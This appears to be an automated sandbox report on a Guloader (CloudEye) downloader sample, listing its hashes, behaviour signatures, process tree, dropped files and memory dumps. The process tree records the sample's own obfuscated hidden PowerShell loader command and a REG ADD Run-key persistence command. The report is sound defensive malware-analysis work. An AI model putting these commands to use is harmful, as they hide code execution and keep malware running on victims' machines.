Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/05/2024, 01:07

General

  • Target

    00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c.exe

  • Size

    391KB

  • MD5

    1e7b3c55e65b93ed3750462bd4e8d58b

  • SHA1

    abec5b9ca7157ab21fb9a5e72ef01f0a15f11a51

  • SHA256

    00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c

  • SHA512

    b75f4bc04c0ec6c0cc49c06a3290c2bfe53eabb9c530660d295d58273636c512613cf9ebd5246dcd1848f155a51f14eaa7c7dc26ce59a97721d5afecdb69ca2a

  • SSDEEP

    12288:HTg5hqq7yL3B2MWy45NDr6K8AVBQ//pR8iQXL:HTg7qdLxn45pJrVBQnnBQXL

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c.exe
    "C:\Users\Admin\AppData\Local\Temp\00db1acc412cdb3aa45f4d55c18785ae9e8c8d7d2dcfacd8306d1f79a5c20a8c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4080
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Dimissorernes=Get-Content 'C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Retshandlingerne29.Dat';$Skoletandlges=$Dimissorernes.SubString(59193,3);.$Skoletandlges($Dimissorernes)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3276
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:2760
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:5056
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Udmark% -windowstyle minimized $Boblekamre=(Get-ItemProperty -Path 'HKCU:\Halvfemsaarsfdselsdages\').Milkwood;%Udmark% ($Boblekamre)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5108
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Udmark% -windowstyle minimized $Boblekamre=(Get-ItemProperty -Path 'HKCU:\Halvfemsaarsfdselsdages\').Milkwood;%Udmark% ($Boblekamre)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:3908

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dc1owjwn.dzy.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Kladdebger.Svi

      Filesize

      328KB

      MD5

      91f9880b33408373db6257b678a4a0bf

      SHA1

      912a4ec00cac46c0b15d53d539039a77137bd86e

      SHA256

      12b35dc28be02873ee8b345ac4a38eeda408aa7505a2f836aa32e3467d939008

      SHA512

      b6747b3d21b8b1e91d212863a2969f1b20b18c4686e71df6fec7d96ff05b74470cd7c063ad7fa47dca467e5e462476feb13b9ddeedfb370283b0fc11a8af454e

    • C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Retshandlingerne29.Dat

      Filesize

      57KB

      MD5

      6db11b1548b28a3b9b2b3e3147cddc04

      SHA1

      7f62e36b96a2d2264a21e98b17cbb6b0710f4335

      SHA256

      af7a18872951b3eef11a71013231b42a2ef418191580cd16505cb8bd4dae8cde

      SHA512

      7e77a496ea3b44479a20a0e9edfd61fcd322ee6365cda15ab908228b936a6219e6fd3162277e46127e532dc51a95b77cf43506caa60060c426510b9721a531dd

    • memory/3276-10-0x0000000005E90000-0x0000000005EF6000-memory.dmp

      Filesize

      408KB

    • memory/3276-8-0x0000000002F30000-0x0000000002F40000-memory.dmp

      Filesize

      64KB

    • memory/3276-9-0x0000000005CF0000-0x0000000005D12000-memory.dmp

      Filesize

      136KB

    • memory/3276-11-0x0000000005F00000-0x0000000005F66000-memory.dmp

      Filesize

      408KB

    • memory/3276-6-0x0000000005610000-0x0000000005C38000-memory.dmp

      Filesize

      6.2MB

    • memory/3276-4-0x0000000002F80000-0x0000000002FB6000-memory.dmp

      Filesize

      216KB

    • memory/3276-21-0x0000000005F70000-0x00000000062C4000-memory.dmp

      Filesize

      3.3MB

    • memory/3276-22-0x0000000006570000-0x000000000658E000-memory.dmp

      Filesize

      120KB

    • memory/3276-31-0x0000000002F30000-0x0000000002F40000-memory.dmp

      Filesize

      64KB

    • memory/3276-24-0x0000000006B10000-0x0000000006BA6000-memory.dmp

      Filesize

      600KB

    • memory/3276-25-0x0000000006AB0000-0x0000000006ACA000-memory.dmp

      Filesize

      104KB

    • memory/3276-26-0x0000000006BD0000-0x0000000006BF2000-memory.dmp

      Filesize

      136KB

    • memory/3276-27-0x0000000007B70000-0x0000000008114000-memory.dmp

      Filesize

      5.6MB

    • memory/3276-7-0x0000000002F30000-0x0000000002F40000-memory.dmp

      Filesize

      64KB

    • memory/3276-5-0x00000000741A0000-0x0000000074950000-memory.dmp

      Filesize

      7.7MB

    • memory/3276-29-0x00000000087A0000-0x0000000008E1A000-memory.dmp

      Filesize

      6.5MB

    • memory/3276-23-0x0000000006610000-0x000000000665C000-memory.dmp

      Filesize

      304KB

    • memory/3276-32-0x0000000002F30000-0x0000000002F40000-memory.dmp

      Filesize

      64KB

    • memory/3276-34-0x0000000007A90000-0x0000000007A94000-memory.dmp

      Filesize

      16KB

    • memory/3276-35-0x0000000008E20000-0x0000000009F5D000-memory.dmp

      Filesize

      17.2MB

    • memory/3276-36-0x0000000008E20000-0x0000000009F5D000-memory.dmp

      Filesize

      17.2MB

    • memory/3276-37-0x00000000741A0000-0x0000000074950000-memory.dmp

      Filesize

      7.7MB

    • memory/3276-40-0x0000000002F30000-0x0000000002F40000-memory.dmp

      Filesize

      64KB

    • memory/3276-39-0x0000000077BF1000-0x0000000077D11000-memory.dmp

      Filesize

      1.1MB

    • memory/3276-38-0x0000000002F30000-0x0000000002F40000-memory.dmp

      Filesize

      64KB

    • memory/3276-42-0x0000000002F30000-0x0000000002F40000-memory.dmp

      Filesize

      64KB

    • memory/3276-43-0x0000000002F30000-0x0000000002F40000-memory.dmp

      Filesize

      64KB

    • memory/3276-44-0x0000000002F30000-0x0000000002F40000-memory.dmp

      Filesize

      64KB

    • memory/3276-45-0x0000000008E20000-0x0000000009F5D000-memory.dmp

      Filesize

      17.2MB

    • memory/3276-53-0x0000000008E20000-0x0000000009F5D000-memory.dmp

      Filesize

      17.2MB

    • memory/3276-52-0x00000000741A0000-0x0000000074950000-memory.dmp

      Filesize

      7.7MB

    • memory/5056-46-0x0000000001200000-0x0000000002454000-memory.dmp

      Filesize

      18.3MB